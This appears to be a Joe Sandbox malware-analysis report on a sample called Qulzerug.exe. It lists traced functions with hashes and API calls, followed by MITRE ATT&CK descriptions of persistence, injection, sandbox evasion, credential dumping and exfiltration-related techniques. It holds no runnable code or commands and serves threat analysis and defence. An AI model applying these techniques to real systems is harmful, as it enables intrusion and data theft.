Function 06DEDCAB Relevance: 1.6, APIs: 1, Instructions: 86
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06DEDCCF

Memory Dump Source

Source File: 0000000C.00000002.2525433407.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6de0000_Qulzerug.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 768c4eabe36d97751880ca3f98f77bea4346852d903c23eacfe683d0ff7a7b41
Instruction ID: 02c50fcee1e6d6ec2b6ca31df1680173a63e757dc5fb7eecd6f99a6078a18856
Opcode Fuzzy Hash: 768c4eabe36d97751880ca3f98f77bea4346852d903c23eacfe683d0ff7a7b41
Instruction Fuzzy Hash: E2315A70E012188FDB25DFA8C5446DDBBF2FF88314F248569D855AB381DB71AC4ACB90

Function 06D50040 Relevance: 1.6, APIs: 1, Instructions: 84
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06D5005F

Memory Dump Source

Source File: 0000000C.00000002.2524638093.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6d50000_Qulzerug.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 24f7292223a021410e42abf12d29cf9d7420a9515d18977b28ca10d6c38e237a
Instruction ID: cf8be908e5a9fedff736add12b126452c11e6a13cdf3386e9ddfdf0be38758e5
Opcode Fuzzy Hash: 24f7292223a021410e42abf12d29cf9d7420a9515d18977b28ca10d6c38e237a
Instruction Fuzzy Hash: C3314774A00209AFDB44CF99D5C0ADDFBF2FF84314F66C659E804AB285C735A989CB94

Function 0161A689 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32(00000043), ref: 0161A654

Memory Dump Source

Source File: 0000000C.00000002.2499168031.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1610000_Qulzerug.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 5c73c0ac2588f4e0c4ed9f2ed96b0185ed9a64023d8b1fcc4d24ac89054106e0
Instruction ID: 546317cdc4fed04afd71aa79b0ca4e9d21e9eb9a6fd2516909fd21509b8824c7
Opcode Fuzzy Hash: 5c73c0ac2588f4e0c4ed9f2ed96b0185ed9a64023d8b1fcc4d24ac89054106e0
Instruction Fuzzy Hash: 7621AFB58093848FCB219FA8D8543EEBFF0EF5A310F18449AC096AB352D7385644CFA5

Function 0161A8C0 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE(00000012), ref: 0161A92F

Memory Dump Source

Source File: 0000000C.00000002.2499168031.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1610000_Qulzerug.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 4d6ee44df04a36bc51cb7a816d5cc685dad596d22f83ff06a0ddca0875bff51d
Instruction ID: 4a2c2eca36fd273a5f71bd2710c1576a990d50a7e7ecbf715c2bd0223bdb09e0
Opcode Fuzzy Hash: 4d6ee44df04a36bc51cb7a816d5cc685dad596d22f83ff06a0ddca0875bff51d
Instruction Fuzzy Hash: 201147B1C006599FDB10CF9AC544BDEFBF4AF08310F15812AD858A7240D378A944CFE5

Function 0161A5D8 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32(00000043), ref: 0161A654

Memory Dump Source

Source File: 0000000C.00000002.2499168031.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1610000_Qulzerug.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: cabd57708b33f6fea5c5d41f4cf8e9c973cb3323730ca744566ea18dd0ab7b07
Instruction ID: 3a030fb97c170088f8e458e51ac40c226303a4c5a2da9055b6cdadeff81889f8
Opcode Fuzzy Hash: cabd57708b33f6fea5c5d41f4cf8e9c973cb3323730ca744566ea18dd0ab7b07
Instruction Fuzzy Hash: 691167B58053888FDB209FA9D4487EEBFF0EB49310F14845ED599A7340D7346684CFA5

Function 0161A8C8 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE(00000012), ref: 0161A92F

Memory Dump Source

Source File: 0000000C.00000002.2499168031.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1610000_Qulzerug.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 8f0162532a050f2ae0fa2006aa9c3fd22c32553e08a352ffb6918adcead668cc
Instruction ID: 6e003abd17f397241cf9669754ee2ec4c668fc6e8b157afd15998ed198162afe
Opcode Fuzzy Hash: 8f0162532a050f2ae0fa2006aa9c3fd22c32553e08a352ffb6918adcead668cc
Instruction Fuzzy Hash: 7C1123B1C006599FDB10CFAAC944BDEFBF4AF48320F15812AD818A7240D378A944CFA5

Function 06D5003B Relevance: 1.5, APIs: 1, Instructions: 40
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06D5005F

Memory Dump Source

Source File: 0000000C.00000002.2524638093.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6d50000_Qulzerug.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc5a425503472236efea30a67b9ab5325fb9de50163e8a4ba199305031294fd7
Instruction ID: c3d1dd17528cbd0f5dc3bf54ade879356c4e7ff10d3645915a6eb6dfeafb303e
Opcode Fuzzy Hash: bc5a425503472236efea30a67b9ab5325fb9de50163e8a4ba199305031294fd7
Instruction Fuzzy Hash: 6C01AD71E01218ABDF14CF99E884ACDFBB6FF88314F258529F80077240C771A988CBA4

Function 0147D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2498010791.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_147d000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfc783c4032e55a73d517c1cbd62e6a7503d2074265ab240c2cc6af7cc2f6643
Instruction ID: 040e9e9521d4dc5c94271ebc52c2c73981dec1089df5989e3a413616e6abe1dc
Opcode Fuzzy Hash: dfc783c4032e55a73d517c1cbd62e6a7503d2074265ab240c2cc6af7cc2f6643
Instruction Fuzzy Hash: 0A2125B5904380DFDB16DF54D980B56BBA1EF84318F24C56ED90A0B366C336D447CA61

Function 0147D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2498010791.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_147d000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd006ec74102e7233e274382e3db65e5d844182aed1227e83e0de17fddc735e7
Instruction ID: 26a13071df218670f5e3568f1d77ae8ab34b4e11017fcf71ba78d138b5a1ec43
Opcode Fuzzy Hash: fd006ec74102e7233e274382e3db65e5d844182aed1227e83e0de17fddc735e7
Instruction Fuzzy Hash: 742160755093C08FD713CF24D590755BF71EF46214F28C5DAD8498B667C33A980ACB62

Analysis Process: Qulzerug.exePID: 1384, Parent PID: 1816COMMON

Execution Graph

Execution Coverage:	13.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	82
Total number of Limit Nodes:	7

Executed Functions

Function 0102DD60 Relevance: 5.4, APIs: 1, Strings: 1, Instructions: 1879libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0102E647

Strings

Y, xrefs: 0102FCF4

Memory Dump Source

Source File: 0000000D.00000002.2498823227.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1020000_Qulzerug.jbxd

Similarity

API ID: InitializeThunk
String ID: Y
API String ID: 2994545307-3233089245
Opcode ID: eed7b327dc409bcb77e12fe2481698f4b5f5000dddf90d93e7f6f6c6a7bc4a2c
Instruction ID: 741733abc21c5555664d67c94753dc9eb3126a351e146aa300e77c028c015f34
Opcode Fuzzy Hash: eed7b327dc409bcb77e12fe2481698f4b5f5000dddf90d93e7f6f6c6a7bc4a2c
Instruction Fuzzy Hash: 3A132A70D107198ECB65EF69C884A9DF7B1FF89300F50C699E458AB261EB70AAC5CF41

Function 068DD258 Relevance: 2.5, APIs: 1, Instructions: 978
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 068DD2D9

Memory Dump Source

Source File: 0000000D.00000002.2523927826.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_68d0000_Qulzerug.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a0e811cf406d9faba57358f56ef9cfe634283c23213c20db4b63174f516a5ccc
Instruction ID: 223c97118f4c4ed15c337f56955f1cc94589ac043c7d1d2edca4815f3eef57b8
Opcode Fuzzy Hash: a0e811cf406d9faba57358f56ef9cfe634283c23213c20db4b63174f516a5ccc
Instruction Fuzzy Hash: 00822A74B402149FDB94EB79C854BAE7BF2BF88340F2084A9E419EB395DE74AC418F51

Function 068DD24A Relevance: 2.3, APIs: 1, Instructions: 767
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 068DD2D9

Memory Dump Source

Source File: 0000000D.00000002.2523927826.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_68d0000_Qulzerug.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ca53554deb5e117ec3fbfc31e8d1698e143737fc9145e4e2c4854dd71464601
Instruction ID: 458f6378ebbc241553bf82133c6e322c55ebdc37aac005e1158f7ad9090f41fb
Opcode Fuzzy Hash: 6ca53554deb5e117ec3fbfc31e8d1698e143737fc9145e4e2c4854dd71464601
Instruction Fuzzy Hash: 20622970A402189FDB94EF79C854BAE7BF2BF88300F2084A9E419EB395DA719D41CF51

Function 0696DCB0 Relevance: 1.9, APIs: 1, Instructions: 446
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0696DCCF

Memory Dump Source

Source File: 0000000D.00000002.2524689476.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6960000_Qulzerug.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 721a247ebe9b2450a5511d4018b74fc684be751c27dded8d41058dfd717e4aed
Instruction ID: 5a41d195349166b9433c04d29831e830768a5e44e4cb90079f578c0d34871bc2
Opcode Fuzzy Hash: 721a247ebe9b2450a5511d4018b74fc684be751c27dded8d41058dfd717e4aed
Instruction Fuzzy Hash: 7F025F74E002098FDB54DFA9C884B9EBBF6BF88300F258559E415AB795DB74EC46CB80

Function 0102A7F0 Relevance: 1.6, APIs: 1, Instructions: 133
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.2498823227.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1020000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5d9b73cdc8cb1a8ff6d6d7aa2ca07ba4fa5c2908c515fe5583fcb1622c497e6
Instruction ID: dd88a92e3ee71eae0965fc7cd78639d749ece4df3397efac2b7e4b12300ae17e
Opcode Fuzzy Hash: b5d9b73cdc8cb1a8ff6d6d7aa2ca07ba4fa5c2908c515fe5583fcb1622c497e6
Instruction Fuzzy Hash: 36412372E043598FDB14DFB9D4103EEBBF5AF89210F15856AD884A7241EB789842CBA1

Function 0696DCA0 Relevance: 1.6, APIs: 1, Instructions: 92
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0696DCCF

Memory Dump Source

Source File: 0000000D.00000002.2524689476.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6960000_Qulzerug.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 225e4ff2a432d7366e0eaf87763c8dc6234850ee89fb730844602a4376820f81
Instruction ID: 7f87455512387e7afe4b85b745a92eaee6093918e04eb0d1c120be3c105ee047
Opcode Fuzzy Hash: 225e4ff2a432d7366e0eaf87763c8dc6234850ee89fb730844602a4376820f81
Instruction Fuzzy Hash: 1431AF70E013188FDF24DFA9C4046DDBBB2BF88314F20856AD464AB781D775AC4ACB90

Function 068D0040 Relevance: 1.6, APIs: 1, Instructions: 84
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 068D005F

Memory Dump Source

Source File: 0000000D.00000002.2523927826.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_68d0000_Qulzerug.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f941f4de24428ae6d9c81f69c1a35c9a127aaa8c68e4699ff5476be1649e83b1
Instruction ID: a05eef472b53b49a39d38d829993ab12462aa5be4fb574a09351584ebed4f10e
Opcode Fuzzy Hash: f941f4de24428ae6d9c81f69c1a35c9a127aaa8c68e4699ff5476be1649e83b1
Instruction Fuzzy Hash: A0313674A01209AFDB08CF95E5C0ADDFBB2FF84314F65C659E404AB285C775A985CBA0

Function 068D0006 Relevance: 1.6, APIs: 1, Instructions: 83
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 068D005F

Memory Dump Source

Source File: 0000000D.00000002.2523927826.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_68d0000_Qulzerug.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 614dc8ba3d29cdd1e3111ab0dff964747e6b42efd0378ff3d33fed959a0012e0
Instruction ID: 754dd10eedba2c4f596cc4d1bb2847cdcdc79608ea663345e8726eb05883bc47
Opcode Fuzzy Hash: 614dc8ba3d29cdd1e3111ab0dff964747e6b42efd0378ff3d33fed959a0012e0
Instruction Fuzzy Hash: D731D730D05388AFDB16CFA4D884ACDBFB1FF46354F15829AD0809B252D7745C8ACBA1

Function 0102A8C0 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE(00000019), ref: 0102A92F

Memory Dump Source

Source File: 0000000D.00000002.2498823227.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1020000_Qulzerug.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 4a1bfe3d7a21a505fd427e051e1714b335922af2d6e7415c23e4a7e988105a21
Instruction ID: 8a594ce48642b42091399a5f4a13ecd5f7531b15777e54cb5678b6ac57477b7e
Opcode Fuzzy Hash: 4a1bfe3d7a21a505fd427e051e1714b335922af2d6e7415c23e4a7e988105a21
Instruction Fuzzy Hash: DB1144B5D002599FDB20CF9AC444BDEFBF4AF08320F15816AD858A7240D778A944CFA5

Function 0102A5D8 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32(00000043), ref: 0102A654

Memory Dump Source

Source File: 0000000D.00000002.2498823227.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1020000_Qulzerug.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: a234815b89478c4942497b5cefcfb5ff6f7bf64c76dbc7188fafffb1cedbc3ef
Instruction ID: c5adb578170cf684f5b87781be5b65aacbacc15339e6961bc518db32ee13b509
Opcode Fuzzy Hash: a234815b89478c4942497b5cefcfb5ff6f7bf64c76dbc7188fafffb1cedbc3ef
Instruction Fuzzy Hash: 581167B5D003488FDB249FA9D0487EEBFF0EB49324F24846EC55AA7240D7796684CFA5

Function 0102A8C8 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE(00000019), ref: 0102A92F

Memory Dump Source

Source File: 0000000D.00000002.2498823227.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1020000_Qulzerug.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: ffdd64366a254c80ccdb975bf724ec2381bd64ef5744d13f66fce5444a3e9336
Instruction ID: ebd6f0c84b9558715dc949fd84bfd904fa558cd134afb6cf2ebcd72052b3920e
Opcode Fuzzy Hash: ffdd64366a254c80ccdb975bf724ec2381bd64ef5744d13f66fce5444a3e9336
Instruction Fuzzy Hash: 831123B5D002699FDB10CF9AC444BDEFBF4AF48320F15816AD818A7240D778A945CFA5

Function 00FDD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2498150005.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_fdd000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddca6ddc1607f3b0792a2d24052f6ac9c7c0ff06e19c72626b93ae221a83e8a5
Instruction ID: 2a74efbe43aa6d1e5483037d67749f21c098950e43a7b1e6070c1d74b1a093ea
Opcode Fuzzy Hash: ddca6ddc1607f3b0792a2d24052f6ac9c7c0ff06e19c72626b93ae221a83e8a5
Instruction Fuzzy Hash: 6A21F576504344DFDB14DF14D988B16BB66EBC4324F28C56ED80A4B34AC337D847DA62

Function 00FDD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2498150005.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_fdd000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0202e48a49a462e0c13ad1f6dcfd961b942a0356f01c0694a684124a933538b8
Instruction ID: 5d189d57ff30d310a6e68362f690fc4b3dbc985b5c12e804026d7e7d3ac37643
Opcode Fuzzy Hash: 0202e48a49a462e0c13ad1f6dcfd961b942a0356f01c0694a684124a933538b8
Instruction Fuzzy Hash: B22153755093808FD712CF24D594715BF71EB46314F29C5EBD8498F6A7C33A980ACB62

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
